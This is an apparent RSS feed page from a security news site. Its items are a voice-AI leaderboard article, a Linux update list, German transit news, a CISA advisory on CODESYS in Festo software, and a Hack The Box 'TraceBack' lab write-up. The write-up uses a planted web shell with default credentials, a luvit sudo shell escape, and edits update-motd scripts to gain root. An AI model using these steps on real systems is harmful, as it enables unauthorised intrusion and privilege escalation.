models, while S2S includes 6.</p><p><b>Dictate Leaderboard (Speech-In, Text-Out)</b></p><p>In this mode, users provide a spoken prompt and evaluate two side-by-side text responses. Here are the baseline scores:</p><ol><li><p><b>Gemini 3 Pro</b> (1073) </p></li><li><p><b>Gemini 3 Flash</b> (1068) </p></li><li><p><b>GPT-4o Audio</b> (1019) </p></li><li><p><b>Qwen 3 Omni</b> (1000) </p></li><li><p><b>Voxtral Small</b> (925) </p></li><li><p><b>Gemma 3n</b> (918) </p></li><li><p><b>GPT Realtime</b> (875) </p></li><li><p><b>Phi-4 Multimodal</b> (729) </p></li></ol><p><b>Note:</b> Gemini 3 Pro and Gemini 3 Flash are statistically tied for the top rank.</p><p><b>Speech-to-Speech (S2S) Leaderboard</b></p><p>In this mode, users speak to the model and evaluate two competing audio responses. Also baselines:</p><ol><li><p><b>Gemini 2.5 Flash Audio</b> (1060) </p></li><li><p><b>GPT-4o Audio</b> (1059) </p></li><li><p><b>Grok Voice</b> (1024) </p></li><li><p><b>Qwen 3 Omni</b> (1000) </p></li><li><p><b>GPT Realtime</b> (962) </p></li><li><p><b>GPT Realtime 1.5</b> (920) </p></li></ol><p><b>Note:</b> Gemini 2.5 Flash Audio and GPT-4o Audio are statistically tied for the top rank in baseline evaluations.</p><p>Dictate rankings are led by Google's Gemini 3 Pro and Gemini 3 Flash, which are statistically tied at #1 with Elo scores around 1,043-1,044 after style controls. </p><p>GPT-4o Audio holds a clear third place. Open-weight models including Gemma3n, Voxtral Small, and Phi-4 Multimodal trail significantly.</p><p>Speech-to-Speech (S2S) rankings show a tighter race at the top, with Gemini 2.5 Flash Audio and GPT-4o Audio statistically tied at #1 in the baseline rankings. </p><p>After adjusting for response length and formatting — factors that can inflate perceived quality — GPT-4o Audio pulls ahead (1,102 Elo vs. 1,075 for Gemini 2.5 Flash Audio). </p><p>Grok Voice jumps to a close second at 1,093 under style controls, suggesting its raw #3 ranking undersells its actual performance quality.</p><p>Qwen 3 Omni, the open-weight model from Alibaba's Qwen team, performs better on pure preference than its popularity would suggest — ranking fourth in both modes, ahead of several higher-profile names. </p><p>"When people come in, they go for the big names," Gu noted. "But for preference, lesser-known models like Qwen actually pull ahead."</p><h2><b>Surprised revealed by real-world preference data</b></h2><p>Beyond rankings, Voice Showdown's real value is in the failure diagnostics — and those paint a more complicated picture of voice AI than most leaderboards reveal.</p><p>The multilingual gap is worse than you think</p><p>Language robustness is the starkest differentiator across models. In Dictate, Gemini 3 models lead across essentially every language tested. </p><p>In S2S, the winner depends heavily on which language is being spoken: GPT-4o Audio leads in Arabic and Turkish; Gemini 2.5 Flash Audio is strongest in French; Grok Voice is competitive in Japanese and Portuguese.</p><p>But the more alarming finding is how frequently some models simply stop responding in the user's language at all.</p><p>GPT Realtime 1.5 — OpenAI's newer real-time voice model — responds in English to non-English prompts roughly 20% of the time, even on high-resource, officially supported languages like Hindi, Spanish, and Turkish. </p><p>Its predecessor, GPT Realtime, mismatches at about half that rate (~10%). Gemini 2.5 Flash Audio and GPT-4o Audio sit at ~7%.</p><p>The phenomenon runs both directions: some models carry non-English context from earlier in a conversation into an English turn, or simply mishear a prompt and generate an unrelated response in the wrong language entirely.</p><p>User verbatims from the platform capture the frustration bluntly: "I said I have an interview today with Quest Management and instead of answering, it gave me information about 'Risk Management.'"</p><p>"GPT Realtime 1.5 thought I was speaking incoherently and recommended mental health assistance, while Qwen 3 Omni correctly identified I was speaking a Nigerian local language."</p><p>The reason existing benchmarks miss this: they're built on synthetic speech optimized for clean acoustic conditions, and they're rarely multilingual. Real speakers in real environments — with background noise, short utterances, and regional accents — break speech understanding in ways lab conditions don't anticipate.</p><h2><b>Voice selection is more than aesthetics</b></h2><p>Voice Showdown evaluates models not just at the model level but at the individual voice level — and the variance within a single model's voice catalog is striking.</p><p>For one unnamed model in the study, the best-performing voice won 30 percentage points more often than the worst-performing voice from the same underlying model. Both voices share the same reasoning and generation backend. The difference is purely in audio presentation.</p><p>The top-performing voices tend to win or lose on audio understanding and content completeness — whether the model heard you correctly and answered fully. But speech quality remains a deciding factor at the voice selection level, particularly when models are otherwise comparable. "Voice directly shapes how users evaluate the interaction," Gu said.</p><h2><b>Models degrade in conversation</b></h2><p>Most benchmarks test a single turn. Voice Showdown tests how models hold up across extended conversations — and the results aren't flattering.</p><p>On Turn 1, content quality accounts for 23% of model failures. By Turn 11 and beyond, it becomes the primary failure mode at 43%. Most models see their win rates decline as conversations extend, struggling to maintain coherence across multiple exchanges.</p><p>GPT Realtime variants are an exception, marginally improving on later turns — consistent with their known strengths on longer contexts, and their documented weakness on the brief, noisy utterances that dominate early interactions.</p><p>Prompt length shows a complementary pattern: short prompts (under 10 seconds) are dominated by audio understanding failures (38%), while long prompts (over 40 seconds) shift the primary failure toward content quality (31%). Shorter audio gives models less acoustic context to parse; longer requests are understood but harder to answer well.</p><h2><b>Why some voice AI models lose</b></h2><p>After every S2S comparison, users tag why they preferred one response over the other across three axes: audio understanding, content quality, and speech output. The failure signatures differ meaningfully by model.</p><p>Qwen 3 Omni's losses cluster around speech generation — its reasoning is competitive, but users are put off by how it sounds. GPT Realtime 1.5's losses are dominated by audio understanding failures (51%), consistent with its language-switching behavior on challenging prompts. Grok Voice's failures are more balanced across all three axes, indicating no single dominant weakness but no particular strength either.</p><h2><b>What's next</b></h2><p>The current leaderboard covers turn-based interaction — you speak, the model responds, repeat. But real voice conversations don't work that way. People interrupt, change direction mid-sentence, and talk over each other.</p><p>Scale says Full Duplex evaluation — designed to capture these real-time dynamics through human preference rather than scripted scenarios or automated metrics — is coming to Showdown next. No existing benchmark captures full-duplex interaction through organic human preference data.</p><p>The leaderboard is live at scale.com/showdown. A public waitlist to join ChatLab and vote on comparisons is open today, with users receiving free access to frontier voice models including GPT-4o, Gemini, and Grok in exchange for occasional preference votes.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TraceBack Box Writeup From HTB DOT EU]]></title>
<description><![CDATA[Looking at the box on HTB rating and graph levels , it looks more of a CTF — Like Box so lets try to crack it :PLets head to start with INFOGATHER as always.1st of Every Penetration Session.INFO GATHERINGstarting with nmap scan as following :sudo nmap -sC -sV -oA nmap/traceback 10.10.10.181two po...]]></description>
<link>https://tsecurity.de/de/3365743/hacking/traceback-box-writeup-from-htb-dot-eu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365743/hacking/traceback-box-writeup-from-htb-dot-eu/</guid>
<pubDate>Fri, 20 Mar 2026 06:34:59 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Looking at the box on HTB rating and graph levels , it looks more of a CTF — Like Box so lets try to crack it :P<br>Lets head to start with INFOGATHER as always.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*Ugz4CH9LV18I_GB2G9lMkw.jpeg"></figure><p><strong><em>1st of Every Penetration Session.</em></strong></p><blockquote><em>INFO GATHERING</em></blockquote><p>starting with nmap scan as following :</p><p><em>sudo nmap -sC -sV -oA nmap/traceback 10.10.10.181</em></p><blockquote>two ports are open from the results <br>22 SSH <br>80 APACHE</blockquote><p>The nmap results are as follows :</p><pre>PORT STATE SERVICE VERSION<br>22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<br>| ssh-hostkey: <br>| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)<br>| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)<br>|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)<br>80/tcp open http Apache httpd 2.4.29 ((Ubuntu))<br>|_http-server-header: Apache/2.4.29 (Ubuntu)<br>|_http-title: Help us<br>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</pre><pre>Service detection performed. Please report any incorrect results at <a href="https://nmap.org/submit/">https://nmap.org/submit/</a> .<br>Nmap done: 1 IP address (1 host up) scanned in 36.74 seconds```</pre><p>lets try all flag , “all ports” maybe we are missing some ports that are open. Just in case.</p><p>lets while that is running enumerate the web directory and check the index and headers , etc.</p><blockquote>looking at the main page we find a scary message :</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/560/1*gxpeAsfEqgYa80AqVHutgw.png"></figure><p>lets see if enumeration work in the next part of this writeup.</p><p>all ports flag also gave us the same results so no need for it actually</p><p>2nd Vital Step of Penetration Session is :</p><blockquote>ENUMERATION AND SCANNING</blockquote><p>Lets enumerate with dirb this time just because it’s easy.</p><pre>dirb <a href="http://10.10.10.181/">http://10.10.10.181</a><br>or sudo dirb <a href="http://10.10.10.181/">http://10.10.10.181</a> -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/resultsenumeration.txt<br>lets wait <br>while we wait lets run some tools<br>```</pre><p>dig 10.10.10.181<br>curl 10.10.10.181</p><p>nothing special.</p><blockquote>lets move forward<br> <br> with enumeration results we get two directories <br> <br>Scanning URL: <a href="http://10.10.10.181/">http://10.10.10.181/</a> — — <br>+ <a href="http://10.10.10.181/index.html">http://10.10.10.181/index.html</a> (CODE:200|SIZE:1113) <br>+ <a href="http://10.10.10.181/server-status">http://10.10.10.181/server-status</a> (CODE:403|SIZE:300)</blockquote><p><em>nothing special about these results lets try another wordlist ..</em></p><p>Lets Scan &gt;&gt;</p><pre><em>dirb </em><a href="http://10.10.10.181/"><em>http://10.10.10.181/</em></a><em> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/resultsenum</em><br></pre><p><em>Lets google the apache ubuntu version.</em></p><blockquote>Apache httpd 2.4.29 ((Ubuntu))</blockquote><p>going back to something i noticed in the source page or the main page lets mention it<br>there was writting something that gave us a clue about what we are dealing with here which is :</p><p>&lt;! — Some of the best web shells that you might need ;) →</p><p>so we have to hack the website using the webshell maybe?<br>or get a reverse connection with something similar.</p><p>Lets research something about this<br>Lets postpone it and use gobuster to try to use another wordlist instead of dirb.</p><pre>gobuster dir -u <a href="http://10.10.10.181/">http://10.10.10.181/</a> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/enumerationweb.txt</pre><p>3rd Step of the Process is</p><blockquote>Exploitation and Examining With Different tools.</blockquote><p>lets start.</p><p>nothing from ZAP</p><p>lets run Raccoon and see if we can get something….</p><p>raccoon 10.10.10.181</p><p>wait for results</p><p>nothing.</p><p>I guess the standard steps doesn’t work lets try to do some OSINT on the target and try to get something useful</p><p>by looking at the main page’s sourcepage again we find something interesting :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/515/1*IF18_5qkUihpApu2oDNR4w.png"></figure><p>by googling this sentence we link to a github page with web shells names , first idea came to my mind is make a list of these webshells for enumeration with gobuster.</p><p><a href="https://github.com/TheBinitGhimire/Web-Shells">https://github.com/TheBinitGhimire/Web-Shells</a></p><p>by running gobuster against this list , BINGO we can find the one url that will lead us to the target webpage</p><p>smevk.php</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/868/1*1L2zVEcaaLz4uUKvAH7J6Q.png"></figure><p>by entering admin admin as credentials we could guess it easily.</p><p>we can login inside the main page</p><p>&lt;div style=”width:100%;height:0;padding-bottom:178%;position:relative;”&gt;&lt;iframe src=”<a href="https://giphy.com/embed/1k4svRPk1DGbB6xUb3">https://giphy.com/embed/1k4svRPk1DGbB6xUb3</a>" width=”100%” height=”100%” style=”position:absolute” frameBorder=”0" class=”giphy-embed” allowFullScreen&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=”<a href="https://giphy.com/gifs/donnathomas-rodgers-instagram-1k4svRPk1DGbB6xUb3">https://giphy.com/gifs/donnathomas-rodgers-instagram-1k4svRPk1DGbB6xUb3</a>"&gt;via GIPHY&lt;/a&gt;&lt;/p&gt;</p><p>after that it looks like we can upload a shell into the page so i uploaded the shell and got a reverse connection back with meterpreter BINGO , we got a shell :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/551/1*RL7r_2dEXtycoJR48-DaUQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/527/1*E-n5JbtMf9Rt72NSlXI5Pw.png"></figure><blockquote>Now we are listening :</blockquote><p>lets upload the shell <br>and execute it!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OurF9SFM2BH6fIWyJhLvwA.png"><figcaption>Don’t Call the COPS</figcaption></figure><p>4th Step Of Penetration Session is</p><blockquote>Privilege Escalation</blockquote><p>by running sudo -l <br>we know that we can run luvit as systemadmin without a password</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/768/1*cKyA0QPp_RbRQT49rTE2iw.png"></figure><p>we are now webadmin by running this command :</p><pre><em>Sudo -u sysadmin /home/sysadmin/luvit -e ‘os.execute(“/bin/sh”)’</em></pre><p><em>we can escape to spawn as sysadmin.</em></p><p>WE GOT THE USER FLAG LETS MOVE ON &gt;</p><p>Next lets get root …<br>i got pspy and i’ll place it in the /dev/shm directory to run it and check the running processes.</p><p>lets log to sysadmin via ssh maybe we can have a much clear idea of what are we dealing with here</p><p>by following these steps:</p><p>in our box :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5JRX5Th-ow6aJNClPQhGPw.png"><figcaption>OURBOX</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KU83v7hxGDVJbUPHSTTgYQ.png"><figcaption>TARGETBOX</figcaption></figure><p>by running pspy we could see the processes and monitor them in realtime <br>a process which caught my attention is update-motd <br>by going to the directory /var/backups/update-motd we can read the files there but we can’t edit them <br>so I decided to go to the original directory which has the files there and BOOM we can edit them.</p><p>by editing this file 00-header :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/795/1*75qbSpzlYiC_Qxc5Asoxnw.png"></figure><p>lets add cat /root/root.txt and see if it works when we log in again<br>we can do many other stuff at this moment but will stick to this way.</p><p>by login in again to ssh we CAN get root , boom !</p><p>done.</p><p>What i learned from this box is that the foothold was a bit tricky to get , which involves a custom dictionary for enumeration but it was hinted out which all you need is a google search and some creativity and fast observing skills.</p><p>Creating the shell was pretty easy so was the foothold but the privesc is a bit interesting it involves an automatic script with update-motd.d script that initiate after 30 sec of every reboots of the system so basically after editing the header to cat /root/root.txt we could log of ssh and relogin after 30 sec we could see the flag when we login again.</p><p>That’s all for this writeup , See you in the NEXT ONES</p><p>Peace!</p><p>SoftAddict OUT</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=641e68a547c7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/traceback-box-writeup-from-htb-dot-eu-641e68a547c7">TraceBack Box Writeup From HTB DOT EU</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 9.0, compat-openssl11, container-tools:rhel8, grub2, and libvpx), Debian (ansible, gst-plugins-base1.0, and nodejs), Fedora (chromium, forgejo, and systemd), Oracle (container-tools:rhel8, grub2, kernel, libpng, libvpx, nginx, opencr...]]></description>
<link>https://tsecurity.de/de/3359295/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3359295/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 18 Mar 2026 14:24:52 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 9.0, compat-openssl11, container-tools:rhel8, grub2, and libvpx), <b>Debian</b> (ansible, gst-plugins-base1.0, and nodejs), <b>Fedora</b> (chromium, forgejo, and systemd), <b>Oracle</b> (container-tools:rhel8, grub2, kernel, libpng, libvpx, nginx, opencryptoki, python3.12, and vim), <b>Red Hat</b> (firefox, python-wheel, python3.12-wheel, and thunderbird), <b>SUSE</b> (389-ds, chromium, clamav, container-suseconnect, curl, freerdp, gvfs, kea, kubernetes, ruby4.0-rubygem-minitar, ruby4.0-rubygem-multi_xml, ruby4.0-rubygem-nokogiri, ruby4.0-rubygem-puma, ruby4.0-rubygem-rack, ruby4.0-rubygem-rack-session, ruby4.0-rubygem-rails, ruby4.0-rubygem-rails-html-sanitizer, ruby4.0-rubygem-railties, ruby4.0-rubygem-rubyzip, vim, and xen), and <b>Ubuntu</b> (flask, libssh, linux-aws-5.15, linux-gcp-5.15, linux-gke, linux-hwe-5.15,
 linux-intel-iotg-5.15, linux-lowlatency-hwe-5.15, linux-oracle-5.15, linux-gcp-6.17, linux-realtime, linux-realtime, linux-realtime, linux-realtime-6.8, snapd, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Maps wird jetzt unverzichtbar für alle ÖPNV-Nutzer]]></title>
<description><![CDATA[Google Maps wird bald für Nutzer des öffentlichen Nahverkehrs in ganz Deutschland zum wichtigsten Hilfsmittel. Denn die bekannte Navigations-App zeigt dann deutschlandweit Echtzeitdaten an.



Möglich macht das eine Kooperation zwischen der Connect Fahrplanauskunft GmbH und Google, wie Erstere in...]]></description>
<link>https://tsecurity.de/de/3358397/it-nachrichten/google-maps-wird-jetzt-unverzichtbar-fuer-alle-oepnv-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3358397/it-nachrichten/google-maps-wird-jetzt-unverzichtbar-fuer-alle-oepnv-nutzer/</guid>
<pubDate>Wed, 18 Mar 2026 09:31:33 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google Maps wird bald für Nutzer des öffentlichen Nahverkehrs in ganz Deutschland zum wichtigsten Hilfsmittel. Denn die bekannte Navigations-App zeigt dann deutschlandweit Echtzeitdaten an.</p>



<p>Möglich macht das eine Kooperation zwischen der Connect Fahrplanauskunft GmbH und Google, wie Erstere in einer <a href="https://connect-fahrplanauskunft.de/2026/03/17/delfi-e-v-und-google-bringen-deutschlandweite-oepnv-echtzeitdaten-auf-google-maps-2026/">Pressemitteilung</a> schreibt. Nachdem bereits bei der Fußball-WM 2024 in Deutschland in Google Maps Echtzeitdaten für den ÖPNV zur Verfügung standen, soll das nun dauerhaft der Fall sein. Und zwar in ganz Deutschland.</p>



<p>Damit können Nutzer des ÖPNV ihre Fahrten quer durch ganz Deutschland nur mit Google Maps exakt planen: “<em>Fahrgäste profitieren von präzisen Prognosedaten, maximaler Planungssicherheit und einer verbesserten Sichtbarkeit regionaler Verkehrsunternehmen auf einer der meistgenutzten Mobilitätsplattformen weltweit</em>“. Die Connect Fahrplanauskunft GmbH schreibt:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Das DELFI e.V. Mitglied, Connect-Fahrplanauskunft und Google haben einen Partnervertrag über die Bereitstellung deutschlandweiter Nahverkehr-Echtzeitdaten (DELFI-Realtime) geschlossen. Ziel der Kooperation ist es, Google einen zentralen und gebündelten Zugang zu qualitätsgesicherten Echtzeitinformationen über Fahrpläne aus ganz Deutschland zu ermöglichen.</p>
</blockquote>



<p>Und weiter: “<em>Die technische Umsetzung der Datenbereitstellung erfolgt über den DELFI-RegioCluster Nord. Dieser wird durch den Verkehrsverbund Bremen/Niedersachsen (VBN) betrieben, die Bereitstellung der Daten erfolgt durch die beiden vom VBN und von der rms (Rhein-Main-Verkehrsverbund Servicegesellschaft mbH) betriebenen RegioCluster</em>. <em>Die Bereitstellung der Echtzeitinformationen erfolgt in Form von Prognosedaten zur Pünktlichkeit im international etablierten Datenformat GTFS Realtime</em>“.</p>



<p><strong>Eine wichtige Information fehlt aber: </strong>Ab wann die Echtzeit-Nahverkehrsdaten in Google Maps den Nutzern tatsächlich zur Verfügung stehen. Wir haben deshalb bei der Connect Fahrplanauskunft GmbH nachgefragt. Sobald uns diese wichtige Information vorliegt, ergänzen wir diese Meldung.</p>



<p><a href="https://www.pcwelt.de/article/3087745/das-groesste-google-maps-update-seit-jahren-so-profitieren-viele-davon-aber-nicht-alle.html" target="_blank" rel="noreferrer noopener">Das größte Google-Maps-Update seit Jahren – so profitieren Sie jetzt davon</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CODESYS in Festo Automation Suite]]></title>
<description><![CDATA[View CSAF
Summary
3. TECHNICAL DETAILS
The following versions of CODESYS in Festo Automation Suite are affected:

FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0) vers:all/* 
FESTO Software Festo Automation Suite ...]]></description>
<link>https://tsecurity.de/de/3356622/it-security-nachrichten/codesys-in-festo-automation-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356622/it-security-nachrichten/codesys-in-festo-automation-suite/</guid>
<pubDate>Tue, 17 Mar 2026 18:05:41 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-076-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>3. TECHNICAL DETAILS</strong></p>
<p>The following versions of CODESYS in Festo Automation Suite are affected:</p>
<ul>
<li>FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0) vers:all/* </li>
<li>FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10) vers:all/* </li>
<li>FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0) vers:all/* </li>
<li>FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10) vers:all/*</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>FESTO, CODESYS</td>
<td>CODESYS in Festo Automation Suite</td>
<td>Direct Request ('Forced Browsing'), Untrusted Search Path, Improper Restriction of Operations within the Bounds of a Memory Buffer, Uncontrolled Recursion, Improper Access Control, Use of Insufficiently Random Values, Improper Restriction of Communication Channel to Intended Endpoints, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), NULL Pointer Dereference, Stack-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Incorrect Permission Assignment for Critical Resource, Improper Handling of Exceptional Conditions, Exposure of Resource to Wrong Sphere, Allocation of Resources Without Limits or Throttling, Use of a Broken or Risky Cryptographic Algorithm, Out-of-bounds Write, Weak Password Recovery Mechanism for Forgotten Password, Improper Privilege Management, Use of Password Hash With Insufficient Computational Effort, Buffer Access with Incorrect Length Value, Improper Input Validation, Improper Verification of Cryptographic Signature, Inadequate Encryption Strength, Origin Validation Error, Missing Release of Memory after Effective Lifetime, Improper Resource Shutdown or Release, Deserialization of Untrusted Data, Path Equivalence: '//multiple/leading/slash', Insufficient Verification of Data Authenticity, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Missing Authentication for Critical Function, Out-of-bounds Read, Failure to Sanitize Special Elements into a Different Plane (Special Element Injection), Use of Out-of-range Pointer Offset, Improper Neutralization of Script in Attributes of IMG Tags in a Web Page, Files or Directories Accessible to External Parties, Untrusted Pointer Dereference, Path Traversal: '....' (Multiple Dot), ASP.NET Misconfiguration: Missing Custom Error Page, Uncontrolled Resource Consumption, Unprotected Transport of Credentials, Initialization of a Resource with an Insecure Default, Heap-based Buffer Overflow, Unexpected Sign Extension, Buffer Over-read, Uncontrolled Search Path Element, Improper Verification of Source of a Communication Channel, Improper Restriction of Excessive Authentication Attempts, Use After Free, ASP.NET Misconfiguration: Password in Configuration File, Improper Check for Unusual or Exceptional Conditions, Observable Discrepancy, Incorrect Default Permissions</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-2595</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-2595">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/425.html">CWE-425 Direct Request ('Forced Browsing')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2010-5250</a></h3>
<div class="csaf-accordion-content">
<p>Untrusted search path vulnerability in the pthread_win32_process_attach_np function in pthreadGC2.dll in Pthreads-win32 2.8.0 allows local users to gain privileges via a Trojan horse quserex.dll file in the current working directory.NOTE: some of these details are obtained from third party information.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2010-5250">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
